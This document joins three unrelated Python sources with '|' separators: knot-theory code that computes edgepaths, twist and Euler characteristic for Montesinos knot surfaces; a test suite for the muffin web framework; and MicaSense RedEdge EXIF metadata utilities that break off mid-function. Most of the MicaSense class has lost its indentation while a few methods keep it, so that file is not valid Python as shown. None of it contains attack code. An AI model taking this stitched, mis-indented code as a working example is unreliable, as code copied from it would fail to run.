    def __repr__(self):
        return "tangle: %i, r = %i, cr = %i, %s" % (self.tangle,
            self.r_value, self.completely_reversible, self.path)
    def compute_final_r_value(self):
        """r-value: denominator (signed) of where the rightmost segment meets u = 1."""
        path = self.path
        if len(path) <= 1: return 0
        p, q = path[0].p(), path[0].q()
        r, s = path[1].p(), path[1].q()
        # using that <p, q> has (u,v) coordinates ( (q - 1)/q, p/q ) its
        # easy to calculate that the intersection of the line through <p,
        # q> and <r, s> with the right edge of T (u = 1) is given by:
        # (p - r)/(q - s)
        rr = frac(p -r, q -s).b
        if p*s < q*r: rr = -rr
        return rr
    def decide_reversibility(self):
        """Return 1 when the path is completely reversible, else 0."""
        path = self.path
        # determine if path is completely reversible. This is the case if
        # for each pair of successive segments of the path lie on
        # triangles of D sharing a common face.
        if len(path) <=2: return 1
        # change leftmost segment if necessary: collapse an interior point
        # onto its left endpoint so every entry is a vertex_of_D
        if isinstance(path[0], interior_of_edge_of_D):
            path = [vertex_of_D(path[0].p(), path[0].q())] + path[1:]
        for i in range(2, len(path)):
            for v in path[i].leftward_neighbors():
                if not joined_by_edge(v, path[i - 2]): return 0
        return 1
    def twist(self):
        # Formula for twist is tau = 2 ( down - up ) where down is the
        # number of edges which decrease slope and up is the number
        # which increase slope.
        tau = 0
        path = self.path
        if len(path) <= 1: return 0
        # iterate over each edge [v, w]
        for i in range(0, len(path) - 1):
            v, w = path[i], path[i+1]
            # fractional twist possible for final edge
            if i == 0 and isinstance(v, interior_of_edge_of_D):
                if v.pq < v.rs:
                    tau = tau + 2*v.km
                else:
                    tau = tau - 2*v.km
            else:
                if v.frac < w.frac:
                    tau = tau + 2
                else:
                    tau = tau - 2
        return tau
    def __eq__(self, o):
        if not isinstance(o, edgepath):
            raise TypeError
        return self.tangle == o.tangle and self.path == o.path
    def clone(self):
        # fresh edgepath over the same vertex list (derived values recomputed)
        return edgepath(self.tangle, self.path)
# a branched surface is a collection of edgepaths one for each tangle.
# The tangles are regarded as cyclically ordered, and if b is
# branched_surface, b[i] is the (i % n)th edgepath, where n = num of
# tangles.
class branched_surface:
    """A collection of edgepaths, one for each tangle.

    The tangles are regarded as cyclically ordered: if b is a
    branched_surface, b[i] is the (i % n)th edgepath, where n is the
    number of tangles.
    """
    def __init__(self, paths, type, u):
        self.edgepaths = paths  # a cyclically ordered list of edgepaths (edgepaths[0] not ness. for tangle 0)
        self.type = type        # I, II, or III
        self.u = u              # u coordinate of ending point
        self.twist = self.compute_twist()
        self.slope = "?"
        self.carries_incompressible = 0
        self.num_sheets = self.comp_sheets()
        self.euler_char = self.comp_euler_char()
        self.from_non_iso_solution = 0  # used only in regression testing against Oretel's ver.
    def __repr__(self):
        if self.carries_incompressible:
            s = "type %s incompressible, " % self.type
        else:
            s = "type %s compressible, " % self.type
        s = s + "u = %s, slope: %s, twist %s, sheets: %i, euler: %i\n" % (self.u,
            self.slope, self.twist, self.num_sheets,
            self.euler_char)
        # we sometimes re-arrange the paths, so print them in the
        # standard order
        for i in range(0, len(self.edgepaths)):
            for path in self.edgepaths:
                if path.tangle == i:
                    s = s + "%s" % path + "\n"
        return s
    # with no args, returns the number of edgepaths that are
    # completely reversible. with arg, which should be a range of
    # numbers, returns the number of edgepaths in that range that are
    # comp. reversible.
    def num_reversible(self, r="noarg"):
        num = 0
        if r == "noarg":
            r = range(0, len(self.edgepaths) )
        for i in r:
            num = num + self[i].completely_reversible
        return num
    def compute_twist(self):
        # total twist is the sum of the twists of the individual paths
        twist = 0
        for path in self.edgepaths:
            twist = twist + path.twist()
        return twist
    def comp_slope(self, seifert_twist):
        # boundary slope relative to the Seifert-surface twist
        self.slope = self.twist - seifert_twist
    def comp_sheets(self):
        # If the endpoint of each path is written (a_i, b_i, c_i) then
        # the number of sheets is the lcm of the a_i. a_i = minimal # of arcs
        # needed to represent that point in the diagram
        a = []
        for path in self.edgepaths:
            a.append( path[0].num_arcs() )
        return lcm(a)
    def comp_euler_char(self):
        """Euler characteristic of the carried surface (pieces, saddles, glueing)."""
        n = len(self.edgepaths)
        sheets = self.num_sheets
        euler_char = 0
        #compute euler char of each piece seperately, add together
        for path in self.edgepaths:
            # base disks
            if len(path) == 1 and isinstance(path[0], interior_of_edge_of_D):
                k , m = path[0].km.t, path[0].km.b
                euler_char = euler_char + 2*sheets + (m-k)*(sheets//k)  # = 2m arcs + m - k circles
            else:
                euler_char = euler_char + 2*sheets
            #count saddles
            num_saddles = 0
            if len(path) != 1:
                # First edge is special case:
                if isinstance(path[0], interior_of_edge_of_D):
                    num_saddles = num_saddles + path[0].km.t * sheets // path[0].km.b
                else:
                    num_saddles = num_saddles + sheets
                # rest of edges
                num_saddles = num_saddles + sheets * (len(path) - 2)
            euler_char = euler_char - num_saddles
        # adjustments for additional saddles
        if self.type == "II":
            sum_of_endpoints = 0
            for path in self.edgepaths:
                sum_of_endpoints = sum_of_endpoints + path[0].p()
            euler_char = euler_char - abs(sum_of_endpoints)*sheets  # adjustment for vert. edges
        if self.type == "III":
            euler_char = euler_char - sheets*n  # adjustment for additional saddles going to infinity
        # now glue together
        if self.type == "III":
            euler_char = euler_char - sheets*n  # adjustment for glueing
        if self.type == "I":
            # we need to know how we glue components which end in arcs
            # together as we go from tangle to tangle (we can ignore
            # those ending in circles because there is no change in
            # euler characteristic when you attach via a circle). Cut
            # the arcs via a vertical line running through the middle
            # of the punctures. The number we want is the number of
            # pieces on one side of the line. If a pair of arcs have
            # slope p/q it interects this line in 2*q places. The
            # number of components C on one side of the line is then
            # (num end pts)/2 = q + 1. This number is independant of
            # the tangle because it depends only on the intersection
            # of the surface with the axis (the line around which the
            # tangles are arranged.
            v = self.edgepaths[0][0]
            if isinstance(v, interior_of_edge_of_D):
                k, m = v.km.t, v.km.b
                # is on horizontal edge <p/q, p/q>
                if v.pq == v.rs:
                    C = (sheets//k)*(k*(v.q() + 1) + (m - k)*v.q())
                else:
                    C = k*sheets//m*(v.q() + 1) + (m - k)*sheets//m*(v.s() + 1)
            else:
                C = (v.q() + 1)*sheets
            # each time we attach a tangle to the next one, we
            # decrease euler_char by -C. The exception is the last
            # glueing where we're gluing together different parts of
            # the same thing. In this case, the euler char increases by
            # C - 2*sheets
            euler_char = euler_char - C*(n - 1) + (C - 2*sheets)
        if self.type == "II":
            euler_char = euler_char - 2*sheets*(n-1)  # see above
        return euler_char
    # cyclically permutes the paths so that the current ith one is
    # made the _last_ one
    def cycle_paths_so_last(self, i):
        i = i % len(self.edgepaths)
        self.edgepaths = self.edgepaths[i+1:] + self.edgepaths[:i] + [ self.edgepaths[i]]
    def reflect(self):
        # mirror image: reverse the cyclic order of the tangles
        self.edgepaths.reverse()
    def r_values(self):
        # sorted list of the final r-values of all paths
        ans = [E.r_value for E in self.edgepaths]
        ans.sort()
        return ans
    # gets ith path with cycle ordering
    def __getitem__(self, i):
        return self.edgepaths[i % len(self.edgepaths)]
    def __eq__(self, o):
        return self.type == o.type and self.u == o.u and self.edgepaths == o.edgepaths
# For each tangle we will need a tree in order to determine the Type I
# solutions. Each node consists of a vertex with links to its two
# leftward neighbors and a link rightward vertex it came from.
class node:
    """Search-tree node used when hunting for Type I solutions.

    Wraps a vertex together with links to its two leftward neighbors and a
    back-link to the rightward vertex it was reached from.
    """

    def __init__(self, vertex, back):
        self.vertex = vertex
        self.leftward = [None, None]  # up/down leftward neighbors, filled later
        self.back = back              # rightward parent in the search tree

    # Delegate the coordinate accessors to the wrapped vertex.
    def p(self):
        return self.vertex.p()

    def q(self):
        return self.vertex.q()

    def u(self):
        return self.vertex.u()

    def v(self):
        return self.vertex.v()

    def __repr__(self):
        pieces = ["%s" % self.vertex]
        if self.leftward[0]:
            pieces.append(" up: " + repr(self.leftward[0].vertex))
        if self.leftward[1]:
            pieces.append(" down " + repr(self.leftward[1].vertex))
        if self.back:
            pieces.append(" back: " + repr(self.back.vertex))
        return "".join(pieces)
class conway_sphere:
    # Sentinel "surface" representing a Conway sphere.  Mirrors the attribute
    # interface of branched_surface (slope, carries_incompressible,
    # num_sheets, euler_char, from_non_iso_solution) so the two can be
    # handled uniformly by the rest of the program.
    slope = frac(1,0)             # infinite slope
    carries_incompressible = 1
    num_sheets = "Conway Sphere"  # label instead of a sheet count
    euler_char = -2
    from_non_iso_solution = 0
    def __repr__(self):
        return "<montesinos_base.conway_sphere>"
# Takes a list of lists [L_1, ... , L_n] and outputs a list consisting
# of all points in the cartesian product of the L1, i.e. every list
# whose ith element is in L_i
def product_of_lists(lists, done=None):
    """Return the cartesian product of the given lists, as a list of lists.

    `done` is the recursion accumulator; callers normally omit it.
    """
    # Avoid a mutable default argument; [[]] is the seed because the
    # product of zero lists is the single empty choice.
    if done is None:
        done = [[]]
    if len(lists) == 0:
        return done
    new_list = []
    # `prefix` instead of the original `list`, which shadowed the builtin.
    for prefix in done:
        for item in lists[0]:
            new_list.append(prefix + [item])
    return product_of_lists(lists[1:], new_list)
|
"""Base Tests."""
from pathlib import Path
from unittest import mock
def test_imports():
    """Every public name must be exposed at the muffin package level."""
    import muffin

    public_names = (
        'Request', 'Response', 'ResponseError', 'ResponseFile',
        'ResponseHTML', 'ResponseJSON', 'ResponseRedirect',
        'ResponseStream', 'ResponseText', 'ASGINotFound',
        'ASGIMethodNotAllowed', 'TestClient',
    )
    for name in public_names:
        assert getattr(muffin, name)
def test_app(app):
    """The `app` fixture carries the expected name and repr."""
    expected_repr = '<muffin.Application: muffin>'
    assert app
    assert app.cfg.name == 'muffin'
    assert repr(app) == expected_repr
def test_app_config():
    """Config merges the module path, environment variables and kwargs."""
    import os

    import muffin

    os.environ['TEST_DEBUG'] = 'true'
    app = muffin.Application('tests.appcfg', config='unknown', name='test')
    cfg = app.cfg
    assert cfg
    assert cfg.CONFIG == 'tests.appcfg'
    assert cfg.CONFIG_VARIABLE == 42
    assert cfg.DEBUG is True
    assert cfg.MANAGE_SHELL
    assert cfg.STATIC_URL_PREFIX == '/static'
async def test_routing(app, client):
    """Routing: plain paths, regex routes, path params, 404/405, trailing slash, sync handlers."""
    import re

    @app.route('/simple', re.compile('/simple/(a|b|c)/?$'), methods=['GET'])
    async def test(request):
        return 200, 'simple'

    @app.route(r'/parameters/{param1}/{param2}')
    async def test(request):
        return 200, request.path_params

    res = await client.get('/simple')
    assert res.status_code == 200
    assert await res.text() == 'simple'
    # unknown path
    res = await client.post('/404')
    assert res.status_code == 404
    # POST is not allowed on /simple (methods=['GET'])
    res = await client.post('/simple')
    assert res.status_code == 405
    # the regex route matches /simple/<a|b|c> with optional trailing slash
    res = await client.get('/simple/a')
    assert res.status_code == 200
    assert await res.text() == 'simple'
    res = await client.get('/simple/b/')
    assert res.status_code == 200
    assert await res.text() == 'simple'
    # path params are delivered as strings
    res = await client.get('/parameters/42/33')
    assert res.status_code == 200
    assert await res.json() == {'param1': '42', 'param2': '33'}

    @app.route('/trim/last/slash/')
    async def test(request):
        return 'OK'

    res = await client.get('/trim/last/slash/')
    assert res.status_code == 200
    assert await res.text() == 'OK'

    # plain (non-async) handlers are supported too
    @app.route('/sync')
    def sync(request):
        return 'Sync OK'

    res = await client.get('/sync')
    assert res.status_code == 200
    assert await res.text() == 'Sync OK'
async def test_responses(app, client):
    """Return-value conversion: None/bool/dict -> JSON, str/bytes -> HTML text."""
    @app.route('/none')
    async def none(request):
        return None

    @app.route('/bool')
    async def none(request):
        return False

    @app.route('/str')
    async def str(request):
        return 'str'

    @app.route('/bytes')
    async def bytes(request):
        return b'bytes'

    @app.route('/json')
    async def json(request):
        return {'test': 'passed'}

    # None and False are JSON-encoded, not treated as "no response"
    res = await client.get('/none')
    assert res.status_code == 200
    assert res.headers['content-type'] == 'application/json'
    assert await res.json() is None
    res = await client.get('/bool')
    assert res.status_code == 200
    assert res.headers['content-type'] == 'application/json'
    assert await res.json() is False
    # str and bytes become HTML text responses
    res = await client.get('/str')
    assert res.status_code == 200
    assert res.headers['content-type'] == 'text/html; charset=utf-8'
    assert await res.text() == 'str'
    res = await client.get('/bytes')
    assert res.status_code == 200
    assert res.headers['content-type'] == 'text/html; charset=utf-8'
    assert await res.text() == 'bytes'
    res = await client.get('/json')
    assert res.status_code == 200
    assert res.headers['content-type'] == 'application/json'
    assert await res.json() == {'test': 'passed'}
async def test_websockets(app, client):
    """A websocket route can accept, receive and send messages, then close."""
    from muffin import ResponseWebSocket

    @app.route('/stream')
    async def stream(request):
        ws = ResponseWebSocket(request)
        await ws.accept()
        msg = await ws.receive()
        assert msg == 'ping'
        await ws.send('pong')
        await ws.close()

    # client side: ping/pong round trip
    async with client.websocket('/stream') as ws:
        await ws.send('ping')
        msg = await ws.receive()
        assert msg == 'pong'
async def test_middlewares(app, client):
    """Both simple (request/response) and classic ASGI middlewares are supported."""
    @app.middleware
    async def simple_middleware(app, request, receive, send):
        # simple style: wraps the app call and may mutate the response
        response = await app(request, receive, send)
        if request.path == '/md/simple':
            response.headers['x-simple'] = 'passed'
        return response

    @app.middleware
    def classic_middleware(app):
        # classic style: a factory returning a raw ASGI app
        async def middleware(scope, receive, send):
            async def custom_send(msg):
                if scope['path'] == '/md/classic' and msg['type'] == 'http.response.start':
                    msg['headers'].append((b'x-classic', b'passed'))
                await send(msg)
            await app(scope, receive, custom_send)
        return middleware

    @app.route('/md/simple')
    async def simple(request):
        return 200,

    @app.route('/md/classic')
    async def classic(request):
        return 200,

    # neither middleware touches unrelated paths
    res = await client.get('/')
    assert res.status_code == 200
    assert not res.headers.get('x-simple')
    assert not res.headers.get('x-classic')
    # each middleware tags only its own path
    res = await client.get('/md/simple')
    assert res.status_code == 200
    assert res.headers['x-simple'] == 'passed'
    assert not res.headers.get('x-classic')
    res = await client.get('/md/classic')
    assert res.status_code == 200
    assert not res.headers.get('x-simple')
    assert res.headers['x-classic'] == 'passed'
async def test_lifespan(app):
    """on_startup runs when the lifespan begins; on_shutdown when it ends."""
    import muffin

    start, finish = mock.MagicMock(), mock.MagicMock()
    app.on_startup(start)
    app.on_shutdown(finish)
    client = muffin.TestClient(app)
    async with client.lifespan():
        # inside the lifespan: started but not yet shut down
        assert start.called
        assert not finish.called
        res = await client.get('/')
        assert res.status_code == 200

    # after the context exits both hooks have fired
    assert start.called
    assert finish.called
def test_configure_logging():
    """LOG_CONFIG must be handed straight to logging.config.dictConfig."""
    import muffin

    log_cfg = {'dummy': 'dict', 'version': 1}
    with mock.patch('logging.config.dictConfig') as dict_config:
        application = muffin.Application('muffin', LOG_CONFIG=log_cfg)
        assert application.logger
        assert application.logger.handlers
        dict_config.assert_called_once_with(log_cfg)
async def test_static_folders():
    """Files from every configured static folder are served under the prefix."""
    import muffin

    app = muffin.Application(
        static_folders=['tests', Path(__file__).parent.parent],
        static_url_prefix='/assets')
    assert app.cfg.STATIC_FOLDERS
    assert app.cfg.STATIC_URL_PREFIX == '/assets'

    @app.route('/')
    async def index(request):
        return 'OK'

    client = muffin.TestClient(app)
    res = await client.get('/')
    assert res.status_code == 200
    # served from the first folder ('tests') — this very test module
    res = await client.get('/assets/test_application.py')
    assert res.status_code == 200
    text = await res.text()
    assert text.startswith('"""Base Tests."""')
    # served from the second folder (the project root)
    res = await client.get('/assets/setup.cfg')
    assert res.status_code == 200
async def test_error_handlers(client, app):
    """on_error handlers: by exception class, by status code, and a catch-all."""
    import muffin

    @app.route('/500')
    async def raise_500(request):
        raise muffin.ResponseError(500)

    @app.route('/unhandled')
    async def raise_unhandled(request):
        raise Exception()

    @app.on_error(muffin.ResponseError)
    async def handler(request, exc):
        return 'Custom Server Error'

    @app.on_error(404)
    async def handler_404(request, exc):
        return 'Custom 404'

    @app.on_error(Exception)
    async def handle_exception(request, exc):
        return 'Custom Unhandled'

    assert app.exception_handlers
    # bare Exception falls through to the catch-all handler
    res = await client.get('/unhandled')
    assert res.status_code == 200
    assert await res.text() == 'Custom Unhandled'
    # ResponseError(500) is caught by the class-based handler
    res = await client.get('/500')
    assert res.status_code == 200
    assert await res.text() == 'Custom Server Error'
    # an unknown route is caught by the status-code handler
    res = await client.get('/404')
    assert res.status_code == 200
    assert await res.text() == 'Custom 404'
    # clean up so other tests see default error behavior again
    del app.exception_handlers[404]
    del app.exception_handlers[muffin.ResponseError]
async def test_nested(client, app):
    """A mounted sub-application runs both its own and the parent's middlewares."""
    @app.middleware
    async def mid(app, req, receive, send):
        response = await app(req, receive, send)
        response.headers['x-app'] = 'OK'
        return response

    from muffin import Application

    subapp = Application()

    @subapp.route('/route')
    def subroute(request):
        return 'OK from subroute'

    @subapp.middleware
    async def mid(app, req, receive, send):
        response = await app(req, receive, send)
        response.headers['x-subapp'] = 'OK'
        return response

    # mount the sub-application under /sub
    app.route('/sub')(subapp)
    res = await client.get('/sub/route')
    assert res.status_code == 200
    assert await res.text() == 'OK from subroute'
    # headers prove both middleware chains ran
    assert res.headers['x-app'] == 'OK'
    assert res.headers['x-subapp'] == 'OK'
|
#!/usr/bin/env python3
# coding: utf-8
"""
RedEdge Metadata Management Utilities
Copyright 2017 MicaSense, Inc.
Permission is hereby granted, free of charge, to any person obtaining a copy of
this software and associated documentation files (the "Software"), to deal in the
Software without restriction, including without limitation the rights to use,
copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the
Software, and to permit persons to whom the Software is furnished to do so,
subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
# Support strings in Python 2 and 3
from __future__ import unicode_literals

import math
from datetime import datetime, timedelta, timezone
from os.path import isfile
from pathlib import Path
from typing import Optional, Union, Tuple, List

import pytz
import pyexiv2
from packaging import version
class MetadataFromExif(object):
"""Container for Micasense image metadata extracted from EXIF metadata"""
def __init__(
self,
filename: Union[str, Path],
):
if not isfile(filename):
raise IOError("Input path is not a file")
md = pyexiv2.ImageMetadata(str(filename))
md.read()
self.exif = md
meta_dict = dict()
if md.exif_keys:
for keys in md.exif_keys:
meta_dict[keys] = md[keys].raw_value
if md.iptc_keys:
for keys in md.iptc_keys:
meta_dict[keys] = md[keys].raw_value
if md.xmp_keys:
for keys in md.xmp_keys:
meta_dict[keys] = md[keys].raw_value
self.meta = meta_dict
def get_all(self) -> dict:
"""Get all extracted metadata items"""
return self.meta
    def get_item(
        self, item: str, index: Optional[int] = None
    ) -> Union[float, int, str, None]:
        """Get metadata item by Namespace:Parameter.

        Returns None when the key is missing. When `index` is given,
        comma-separated string values are split before indexing.
        """
        val = None
        try:
            val = self.exif[item]
            if index is not None:
                try:
                    # Python 2 only: coerce unicode values to ascii bytes.
                    if isinstance(val, unicode):
                        val = val.encode("ascii", "ignore")
                except NameError:
                    # throws on python 3 where unicode is undefined
                    pass
                if isinstance(val, str) and len(val.split(",")) > 1:
                    val = val.split(",")
                val = val[index]
        except KeyError:
            # missing tag: deliberately fall through and return None
            # print ("Item "+item+" not found")
            pass
        except IndexError:
            print(
                "Item {0} is length {1}, index {2} is outside this range.".format(
                    item, len(self.exif[item]), index
                )
            )
        return val
def print_all(self) -> None:
for item in self.get_all():
print("{}: {}".format(item, self.get_item(item)))
def dls_present(self) -> bool:
dls_keys = [
"Xmp.DLS.HorizontalIrradiance",
"Xmp.DLS.DirectIrradiance",
"Xmp.DLS.SpectralIrradiance",
]
return any([v in self.meta.keys() for v in dls_keys])
def supports_radiometric_calibration(self) -> bool:
return "Xmp.MicaSense.RadiometricCalibration" in self.meta.keys()
def position(self) -> Tuple[float, float, float]:
"""get the WGS-84 latitude, longitude tuple as signed decimal degrees"""
def convert_deg2decimal(coord: List) -> float:
return (
coord[0].__float__()
+ (coord[1].__float__() / 60.0)
+ (coord[2].__float__() / 3600.0)
)
lat = convert_deg2decimal(self.exif["Exif.GPSInfo.GPSLatitude"].value)
latref = self.exif["Exif.GPSInfo.GPSLatitudeRef"].value
lat = lat if latref == "N" else -lat
lon = convert_deg2decimal(self.exif["Exif.GPSInfo.GPSLongitude"].value)
lonref = self.exif["Exif.GPSInfo.GPSLongitudeRef"].value
lon = lon if lonref == "E" else -lon
alt = float(self.exif["Exif.GPSInfo.GPSAltitude"].value)
return lat, lon, alt
def utc_time(self) -> Union[datetime, None]:
"""Get the timezone-aware datetime of the image capture"""
try:
utctime_rval = self.exif["Exif.Image.DateTime"].raw_value
except KeyError:
utctime_rval = None
if utctime_rval is None:
utctime = None
else:
utctime = datetime.strptime(utctime_rval, "%Y:%m:%d %H:%M:%S")
# utctime can also be obtained with DateTimeOriginal:
# utctime = datetime.strptime(
# self.exif["Exif.Photo.DateTimeOriginal"].raw_value, "%Y:%m:%d %H:%M:%S"
# )
# extract the millisecond from the EXIF metadata:
subsec = int(self.exif["Exif.Photo.SubSecTime"].raw_value)
sign = -1.0 if subsec < 0 else 1.0
millisec = sign * 1e3 * float("0.{}".format(abs(subsec)))
utctime += timedelta(milliseconds=millisec)
timezone = pytz.timezone("UTC")
utctime = timezone.localize(utctime)
return utctime
def dls_pose(self) -> Tuple[float, float, float]:
"""get DLS pose as local earth-fixed yaw, pitch, roll in radians"""
pose_keys = ["Xmp.DLS.Yaw", "Xmp.DLS.Pitch", "Xmp.DLS.Roll"]
if all([v in self.meta.keys() for v in pose_keys]):
yaw = float(self.exif["Xmp.DLS.Yaw"].value)
pitch = float(self.exif["Xmp.DLS.Pitch"].value)
roll = float(self.exif["Xmp.DLS.Roll"].value)
else:
yaw = pitch = roll = 0.0
return yaw, pitch, roll
def rig_relatives(self) -> Union[List[float], None]:
if "Xmp.Camera.RigRelatives" in self.meta.keys():
return [
float(i) for i in self.exif["Xmp.Camera.RigRelatives"].value.split(",")
]
else:
return None
def capture_id(self) -> Union[None, str]:
return self.exif["Xmp.MicaSense.CaptureId"].value
def flight_id(self) -> Union[None, str]:
return self.exif["Xmp.MicaSense.FlightId"].value
def camera_make(self) -> Union[None, str]:
# this should return "micasense"
return self.exif["Exif.Image.Make"].value
def camera_model(self) -> Union[None, str]:
# this should return "RedEdge-M"
return self.exif["Exif.Image.Model"].value
def firmware_version(self) -> Union[None, str]:
return self.exif["Exif.Image.Software"].value
def band_name(self) -> Union[None, str]:
# for Red-Camera:
# Blue, Green, Red, NIR, Red edge
# for Blue-Camera:
# Blue-444, Green-531, Red-650, Red edge-705, Red edge-740
return self.exif["Xmp.Camera.BandName"].value
def band_index(self) -> Union[None, int]:
# for Red-Camera
# 0, 1, 2, 3, 4
# for Blue-Camera
# 5, 6, 7, 8, 9
k = "Xmp.Camera.RigCameraIndex"
return int(self.exif[k].value) if k in self.meta.keys() else None
def exposure(self) -> float:
"""extract the exposure (integration time) in seconds"""
exp = float(self.exif["Exif.Photo.ExposureTime"].value)
# correct for incorrect exposure in some legacy RedEdge firmware versions
if self.camera_model() != "Altum":
if math.fabs(exp - (1.0 / 6329.0)) < 1e-6:
exp = 0.000274
return exp
def gain(self) -> float:
"""extract the image gain"""
return float(self.exif["Exif.Photo.ISOSpeed"].value) / 100.0
def image_size(self) -> Tuple[int, int]:
"""extract the image size (ncols, nrows)"""
return int(self.exif["Exif.Image.ImageWidth"].value), int(
self.exif["Exif.Image.ImageLength"].value
)
def center_wavelength(self) -> float:
"""extract the central wavelength (nm)"""
return float(self.exif["Xmp.Camera.CentralWavelength"].value)
def bandwidth(self) -> float:
"""extract the bandwidth (nm)"""
return float(self.exif["Xmp.Camera.WavelengthFWHM"].value)
def radiometric_cal(self) -> List[float]:
"""extract the radiometric calibration coefficients"""
return [float(v) for v in self.exif["Xmp.MicaSense.RadiometricCalibration"].value]
def black_level(self) -> float:
"""Extract the mean dark current"""
if "Exif.Image.BlackLevel" in self.meta.keys():
bl_sum, bl_num = 0.0, 0.0
for x in self.exif["Exif.Image.BlackLevel"].value:
bl_sum += float(x)
bl_num += 1.0
mean_bl = bl_sum / bl_num
else:
mean_bl = 0.0
return mean_bl
def dark_pixels(self) -> float:
"""
Get the average of the optically covered pixel values
Note: these pixels are raw, and have not been radiometrically
corrected. Use the black_level() method for all
radiomentric calibrations
"""
total, num = 0.0, 0.0
for pixel in self.exif["Xmp.MicaSense.DarkRowValue"].value:
total += float(pixel)
num += 1.0
return total / float(num)
def bits_per_pixel(self) -> int:
"""
get the number of bits per pixel, which defines the
maximum digital number value in the image
"""
return int(self.exif["Exif.Image.BitsPerSample"].value)
def vignette_center(self) -> List[float]:
"""get the vignette center in X and Y image coordinates"""
k = "Xmp.Camera.VignettingCenter"
return [float(v) for v in self.exif[k].value] if k in self.meta.keys() else None
def vignette_polynomial(self) -> List[float]:
"""
get the radial vignette polynomial in the order
it's defined within the metadata
"""
k = "Xmp.Camera.VignettingPolynomial"
return [float(v) for v in self.exif[k].value] if k in self.meta.keys() else None
def distortion_parameters(self) -> List[float]:
return [float(v) for v in self.exif["Xmp.Camera.PerspectiveDistortion"].value]
def principal_point(self) -> List[float]:
return [float(v) for v in self.exif["Xmp.Camera.PrincipalPoint"].value.split(",")]
def focal_plane_resolution_px_per_mm(self) -> Tuple[float, float]:
fp_x_resolution = float(self.exif["Exif.Photo.FocalPlaneXResolution"].value)
fp_y_resolution = float(self.exif["Exif.Photo.FocalPlaneYResolution"].value)
return fp_x_resolution, fp_y_resolution
def focal_length_mm(self) -> float:
key = "Xmp.Camera.PerspectiveFocalLengthUnits"
units = None if key not in self.meta.keys() else self.exif[key].value
focal_len_mm = 0.0
if units == "mm":
focal_len_mm = float(self.exif["Xmp.Camera.PerspectiveFocalLength"].value)
else:
focal_len_px = float(self.exif["Xmp.Camera.PerspectiveFocalLength"].value)
focal_len_mm = focal_len_px / self.focal_plane_resolution_px_per_mm()[0]
return focal_len_mm
def sfactor_35mm(self) -> float:
"""
extract the 35mm scale factor, sf[35], such that,
35 mm equivalent focal length = sf[35] * focal_length
"""
def __calc_backend(pxl_um: float, ncols: int, nrows: int) -> float:
"""
Backend calculation of the 35 mm scale factor
Parameters
----------
pxl_um : pixel size (micrometers, um) [float]
ncols : image width (or number of image columns) [int]
nrows : image height (or number of image rows) [int]
"""
pxl_mm = pxl_um / 1000.0 # pixel size in mm
diag_img = ((ncols * pxl_mm) ** 2 + (nrows * pxl_mm) ** 2) ** 0.5
diag_35mm = ((36.0) ** 2 + (24.0) ** 2) ** 0.5
return diag_35mm / diag_img
w, h = self.image_size()
pxl_size = 3.75 # micrometers
if self.camera_model() == "Altum":
if self.band_name().lower() == "lwir":
pxl_size = 12.0 # micrometers
else:
pxl_size = 3.45
return __calc_backend(pxl_size, w, h)
def focal_length_35_mm_eq(self) -> float:
# pyexiv2 cannot access the Composite keys including:
# Composite:FocalLength35efl
return float(self.exif["Exif.Photo.FocalLength"].value) * self.sfactor_35mm()
def irradiance_scale_factor(self) -> float:
    """
    Get the calibration scale factor for the irradiance measurements
    in this image metadata. Due to calibration differences between
    DLS1 and DLS2, we need to account for a scale factor change in
    their respective units. This scale factor is pulled from the image
    metadata, or, if the metadata doesn't give us the scale, we assume
    one based on a known combination of tags
    """
    scale_key = "Xmp.DLS.IrradianceScaleToSIUnits"
    # key = "Xmp.Camera.IrradianceScaleToSIUnits"
    if scale_key in self.meta.keys():
        # the metadata explicitly provides the scale
        return float(self.exif[scale_key].value)
    if "Xmp.DLS.HorizontalIrradiance" in self.meta.keys():
        # DLS2 but the metadata is missing the scale; the DLS2 reports
        # processed irradiance in micro-W/cm^2/nm, and
        # W/m^2/nm = 0.01 micro-W/cm^2/nm, hence 0.01
        return 0.01
    # DLS1, so we use a scale of 1
    return 1.0
def horizontal_irradiance_valid(self) -> bool:
    """
    Defines if horizontal irradiance tag contains a value that can be trusted
    some firmware versions had a bug whereby the direct and scattered irradiance
    were correct, but the horizontal irradiance was calculated incorrectly
    """
    if "Xmp.DLS.HorizontalIrradiance" not in self.meta.keys():
        # no DLS2 horizontal-irradiance tag at all
        return False
    version_string = self.firmware_version().strip("v")
    # minimum firmware version carrying the horizontal-irradiance fix,
    # per camera model
    if self.camera_model() == "Altum":
        good_version = "1.2.3"
    elif self.camera_model() == "RedEdge" or self.camera_model() == "RedEdge-M":
        good_version = "5.1.7"
    else:
        raise ValueError(
            "Camera model is required to be RedEdge or Altum, not {} ".format(
                self.camera_model()
            )
        )
    return version.parse(version_string) >= version.parse(good_version)
def __float_or_zero(self, key: str) -> float:
    # Read a tag as float, defaulting to 0.0 when the tag is absent.
    # NOTE(review): presence is tested in self.meta, value read from
    # self.exif -- presumably the same key space; confirm upstream.
    return 0.0 if key not in self.meta.keys() else float(self.exif[key].value)
def __get_irrad(self, key: str) -> float:
    # Read an irradiance tag and convert it to SI units (W/m^2/nm)
    # using the DLS1/DLS2 calibration scale factor.
    return self.__float_or_zero(key) * self.irradiance_scale_factor()
def spectral_irradiance(self) -> float:
    """
    Raw spectral irradiance measured by an irradiance sensor.
    Calibrated to W/m^2/nm using irradiance_scale_factor, but
    not corrected for angles.  Returns 0.0 when the tag is absent.
    """
    return self.__get_irrad("Xmp.DLS.SpectralIrradiance")
def horizontal_irradiance(self) -> float:
    """
    Horizontal irradiance at the earth's surface below the DLS on the
    plane normal to the gravity vector at the location (local flat
    plane spectral irradiance).  Returns 0.0 when the tag is absent.
    """
    return self.__get_irrad("Xmp.DLS.HorizontalIrradiance")
def scattered_irradiance(self) -> float:
